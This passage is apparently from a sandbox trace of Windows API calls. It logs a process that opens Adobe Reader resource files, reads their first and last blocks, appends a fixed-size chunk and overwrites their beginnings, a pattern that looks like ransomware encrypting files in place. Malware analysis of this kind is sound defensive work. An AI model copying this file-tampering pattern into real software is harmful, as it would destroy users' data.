cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0086.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nn_NO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nn_NO.txt", lpUsedDefaultChar=0x0) returned 30 [0086.072] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.241] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5df2 [0086.241] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.984] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5df2 [0086.984] WriteFile (in: hFile=0x1d4, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.275] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0087.275] WriteFile (in: hFile=0x1d4, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0087.276] CloseHandle (hObject=0x1d4) returned 1 [0087.276] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0087.276] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0087.277] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7498 [0087.277] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0087.277] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.277] ReleaseMutex (hMutex=0x168) returned 1 [0087.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ru.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0087.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ru.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ru.txt", lpUsedDefaultChar=0x0) returned 27 [0087.277] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.264] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6498 [0088.264] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.332] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6498 [0088.332] WriteFile (in: hFile=0x1d4, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0088.333] WriteFile (in: hFile=0x1d4, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.333] CloseHandle (hObject=0x1d4) returned 1 [0088.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0088.429] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0088.429] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7144 [0088.429] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0088.429] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.429] ReleaseMutex (hMutex=0x168) returned 1 [0088.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sv_FI.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0088.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sv_FI.txt", cchWideChar=30, lpMultiByteStr=0x1f8fc3c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.sv_FI.txt", lpUsedDefaultChar=0x0) returned 30 [0088.429] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.547] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6144 [0088.547] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6144 [0088.603] WriteFile (in: hFile=0x1d4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0088.603] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.603] CloseHandle (hObject=0x1d4) returned 1 [0088.604] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0089.273] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0089.273] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x608c [0089.273] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0089.273] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.273] ReleaseMutex (hMutex=0x168) returned 1 [0089.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.zh_TW_STROKE.txt", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0089.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.zh_TW_STROKE.txt", cchWideChar=37, lpMultiByteStr=0x1fa53fc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.zh_TW_STROKE.txt", lpUsedDefaultChar=0x0) returned 37 [0089.273] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.018] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x508c [0090.018] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.615] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x508c [0090.616] WriteFile (in: hFile=0x1d4, lpBuffer=0x2867ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867ab8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.616] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0090.616] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.616] CloseHandle (hObject=0x1d4) returned 1 [0090.616] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt55.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0090.938] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0090.938] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x82800 [0090.938] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0090.938] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.938] ReleaseMutex (hMutex=0x168) returned 1 [0090.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt55.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0090.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt55.ths", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brt55.ths", lpUsedDefaultChar=0x0) returned 9 [0090.938] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.276] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.371] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x81800 [0092.372] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea98e8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.427] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x81800 [0092.428] WriteFile (in: hFile=0x1d4, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.477] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0092.477] WriteFile (in: hFile=0x1d4, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.484] WriteFile (in: hFile=0x1d4, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.485] CloseHandle (hObject=0x1d4) returned 1 [0092.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bulphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bulphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.503] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.503] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1430 [0092.503] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.503] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.503] ReleaseMutex (hMutex=0x168) returned 1 [0092.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bulphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bulphon.env", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bulphon.env", lpUsedDefaultChar=0x0) returned 11 [0092.503] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1430, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f2bc*=0x1430, lpOverlapped=0x0) returned 1 [0092.517] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0092.517] WriteFile (in: hFile=0x1d4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x19b8, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f2d0*=0x19b8, lpOverlapped=0x0) returned 1 [0092.517] CloseHandle (hObject=0x1d4) returned 1 [0092.517] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.529] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.529] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7ffe [0092.529] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.529] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.529] ReleaseMutex (hMutex=0x168) returned 1 [0092.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr32.clx", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfr32.clx", lpUsedDefaultChar=0x0) returned 9 [0092.529] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.543] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6ffe [0092.543] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.586] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6ffe [0092.586] WriteFile (in: hFile=0x1d4, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.587] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0092.587] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.587] CloseHandle (hObject=0x1d4) returned 1 [0092.587] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.596] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.596] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe000 [0092.596] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.596] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.596] ReleaseMutex (hMutex=0x168) returned 1 [0092.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cze.hyp", lpUsedDefaultChar=0x0) returned 7 [0092.596] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0092.606] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xd000 [0092.606] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.615] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xd000 [0092.615] WriteFile (in: hFile=0x204, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.615] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0092.615] WriteFile (in: hFile=0x204, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0092.616] CloseHandle (hObject=0x204) returned 1 [0092.616] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.617] 